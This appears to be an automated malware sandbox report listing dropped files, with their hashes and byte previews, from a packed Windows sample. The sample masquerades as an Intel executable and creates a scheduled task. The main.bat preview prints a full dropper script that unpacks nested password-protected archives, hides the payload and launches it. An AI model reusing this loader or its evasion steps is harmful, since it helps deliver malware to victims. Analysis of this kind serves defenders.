                                                                                                                                                                  SSDEEP:49152:8yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ+:tj13Trb6i5iGmuXZTbBizt0Jhc
                                                                                                                                                                  MD5:5659EBA6A774F9D5322F249AD989114A
                                                                                                                                                                  SHA1:4BFB12AA98A1DC2206BAA0AC611877B815810E4C
                                                                                                                                                                  SHA-256:E04346FEE15C3F98387A3641E0BBA2E555A5A9B0200E4B9256B1B77094069AE4
                                                                                                                                                                  SHA-512:F93ABF2787B1E06CE999A0CBC67DC787B791A58F9CE20AF5587B2060D663F26BE9F648D116D9CA279AF39299EA5D38E3C86271297E47C1438102CA28FCE8EDC4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:PK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./..t?......6FU....;2].@...z..8..K^B/W..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\main\extracted\file_2.zip

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                  File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1799748
                                                                                                                                                                  Entropy (8bit):7.997729415613798
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:49152:5yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ/:4j13Trb6i5iGmuXZTbBizt0Jhl
                                                                                                                                                                  MD5:5404286EC7853897B3BA00ADF824D6C1
                                                                                                                                                                  SHA1:39E543E08B34311B82F6E909E1E67E2F4AFEC551
                                                                                                                                                                  SHA-256:EC94A6666A3103BA6BE60B92E843075A2D7FE7D30FA41099C3F3B1E2A5EBA266
                                                                                                                                                                  SHA-512:C4B78298C42148D393FEEA6C3941C48DEF7C92EF0E6BAAC99144B083937D0A80D3C15BD9A0BF40DAA60919968B120D62999FA61AF320E507F7E99FBFE9B9EF30
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:PK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\main\extracted\file_3.zip

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                  File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1799902
                                                                                                                                                                  Entropy (8bit):7.997726708945573
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:49152:Cyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJV:nj13Trb6i5iGmuXZTbBizt0Jh3
                                                                                                                                                                  MD5:5EB39BA3698C99891A6B6EB036CFB653
                                                                                                                                                                  SHA1:D2F1CDD59669F006A2F1AA9214AEED48BC88C06E
                                                                                                                                                                  SHA-256:E77F5E03AE140DDA27D73E1FFE43F7911E006A108CF51CBD0E05D73AA92DA7C2
                                                                                                                                                                  SHA-512:6C4CA20E88D49256ED9CABEC0D1F2B00DFCF3D1603B5C95D158D4438C9F1E58495F8DFA200DBE7F49B5B0DD57886517EB3B98C4190484548720DAD4B3DB6069E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:PK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\main\extracted\file_4.zip

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                  File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1800056
                                                                                                                                                                  Entropy (8bit):7.997723543142523
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:49152:Zyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJQ:Yj13Trb6i5iGmuXZTbBizt0Jhm
                                                                                                                                                                  MD5:7187CC2643AFFAB4CA29D92251C96DEE
                                                                                                                                                                  SHA1:AB0A4DE90A14551834E12BB2C8C6B9EE517ACAF4
                                                                                                                                                                  SHA-256:C7E92A1AF295307FB92AD534E05FBA879A7CF6716F93AEFCA0EBFCB8CEE7A830
                                                                                                                                                                  SHA-512:27985D317A5C844871FFB2527D04AA50EF7442B2F00D69D5AB6BBB85CD7BE1D7057FFD3151D0896F05603677C2F7361ED021EAC921E012D74DA049EF6949E3A3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:PK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\main\extracted\file_5.zip

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                  File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1800210
                                                                                                                                                                  Entropy (8bit):7.997720745184939
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:49152:ayj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJw:Pj13Trb6i5iGmuXZTbBizt0JhG
                                                                                                                                                                  MD5:B7D1E04629BEC112923446FDA5391731
                                                                                                                                                                  SHA1:814055286F963DDAA5BF3019821CB8A565B56CB8
                                                                                                                                                                  SHA-256:4DA77D4EE30AD0CD56CD620F4E9DC4016244ACE015C5B4B43F8F37DD8E3A8789
                                                                                                                                                                  SHA-512:79FC3606B0FE6A1E31A2ECACC96623CAF236BF2BE692DADAB6EA8FFA4AF4231D782094A63B76631068364AC9B6A872B02F1E080636EBA40ED019C2949A8E28DB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:PK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\main\extracted\file_6.zip

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                  File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1800364
                                                                                                                                                                  Entropy (8bit):7.997716835838842
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:49152:kyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJv:lj13Trb6i5iGmuXZTbBizt0Jht
                                                                                                                                                                  MD5:0DC4014FACF82AA027904C1BE1D403C1
                                                                                                                                                                  SHA1:5E6D6C020BFC2E6F24F3D237946B0103FE9B1831
                                                                                                                                                                  SHA-256:A29DDD29958C64E0AF1A848409E97401307277BB6F11777B1CFB0404A6226DE7
                                                                                                                                                                  SHA-512:CBEEAD189918657CC81E844ED9673EE8F743AED29AD9948E90AFDFBECACC9C764FBDBFB92E8C8CEB5AE47CEE52E833E386A304DB0572C7130D1A54FD9C2CC028
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:PK........n..Y..+..x...x......file_5.zipPK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\main\extracted\file_7.zip

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3473559
                                                                                                                                                                  Entropy (8bit):7.9992359395959935
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:98304:8aR3D0Ae5mwdkDWm1Xo4j13Trb6i5iGmuXZTbBizt0Jhd:ds5m6sXoArb6iguZnBi5Qd
                                                                                                                                                                  MD5:CEA368FC334A9AEC1ECFF4B15612E5B0
                                                                                                                                                                  SHA1:493D23F72731BB570D904014FFDACBBA2334CE26
                                                                                                                                                                  SHA-256:07E38CAD68B0CDBEA62F55F9BC6EE80545C2E1A39983BAA222E8AF788F028541
                                                                                                                                                                  SHA-512:BED35A1CC56F32E0109EA5A02578489682A990B5CEFA58D7CF778815254AF9849E731031E824ADBA07C86C8425DF58A1967AC84CE004C62E316A2E51A75C8748
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:PK........n..Y`.T......#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..|...$..}.`..8......lV1*..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T....*..A..|...{A.p{.b*.|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.|.g....&.d..Y.|..5O...s.|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\main\extracted\in.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1827328
                                                                                                                                                                  Entropy (8bit):7.963282633529333
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
                                                                                                                                                                  MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                  SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                                  SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                                  SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\main\file.bin

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exe
                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3473725
                                                                                                                                                                  Entropy (8bit):7.999948676888215
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                                  MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                  SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                  SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                  SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\main\file.zip (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3473725
                                                                                                                                                                  Entropy (8bit):7.999948676888215
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                                  MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                  SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                  SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                  SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\main\main.bat

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exe
                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):440
                                                                                                                                                                  Entropy (8bit):5.0791308599041844
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:QUp+CF16g64CTFMj2LIQLvDHW7PCVGrMLvmuCogLKO8NerxVv:QUpNF16g632CkezWDCVGYTOLv8k7
                                                                                                                                                                  MD5:3626532127E3066DF98E34C3D56A1869
                                                                                                                                                                  SHA1:5FA7102F02615AFDE4EFD4ED091744E842C63F78
                                                                                                                                                                  SHA-256:2A0E18EF585DB0802269B8C1DDCCB95CE4C0BAC747E207EE6131DEE989788BCA
                                                                                                                                                                  SHA-512:DCCE66D6E24D5A4A352874144871CD73C327E04C1B50764399457D8D70A9515F5BC0A650232763BF34D4830BAB70EE4539646E7625CFE5336A870E311043B2BD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p24291711423417250691697322505 -oextracted ..for /l %%i in (7,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..

                                                                                                                                                                  C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1827328
                                                                                                                                                                  Entropy (8bit):7.963282633529333
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
                                                                                                                                                                  MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                  SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                                  SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                                  SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...

                                                                                                                                                                  C:\Windows\Tasks\skotes.job

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):302
                                                                                                                                                                  Entropy (8bit):3.47521512957776
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:NaxSTXUhXUEZ+lX1CGdKUe6tE9+AQy0lx0ut0:NSU4Q1CGAFD9+nVOut0
                                                                                                                                                                  MD5:6877AF701A6C73D4ED22816503A04707
                                                                                                                                                                  SHA1:8D7214F30FB40D3E10A1C91786AD6ED7DBBF4F75
                                                                                                                                                                  SHA-256:040B08D9ECCCFAC2B0DB6FEBF910772F38922E46920BFB96F7FEF788FFF456F9
                                                                                                                                                                  SHA-512:3C4893BF668D91A7BDBC3F80DF9680F41F50C1E089D7AFF014CE999FA9502BA05000F0E8F19CA5F0DDD2806AAE510473939162B816EAFDF76E01C747AA17BC8A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.....?.u...M...h.B`.F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................

                                                                                                                                                                  \Device\ConDrv

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):350
                                                                                                                                                                  Entropy (8bit):5.0682682106683945
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:AMMyS3pt+uoQcAxXF2SaioBQypHSTgqF1AivwtHgNmtQFfpap1tNjtv:pMpDh5RwXSTgqFyYwzuJA1tNp
                                                                                                                                                                  MD5:2F644B7E25627553C5731B735473C859
                                                                                                                                                                  SHA1:5A3C2158A1FCF27AE6807A8079894FFE8D33FBEA
                                                                                                                                                                  SHA-256:2B34B0DE62F49C19D1F9A004AD698E2612F7FCD5072F5C9834621C62F15FB55F
                                                                                                                                                                  SHA-512:E83CA818C9785EB3A0297E65F08E22DC9E29A368BCADC9887B64EC746C88B79ACBAD20B4B6D49C07CB819ACE21B00C2BEB083F18A0CD5528D2BD00A7B0C4E802
                                                                                                                                                                  Malicious:false
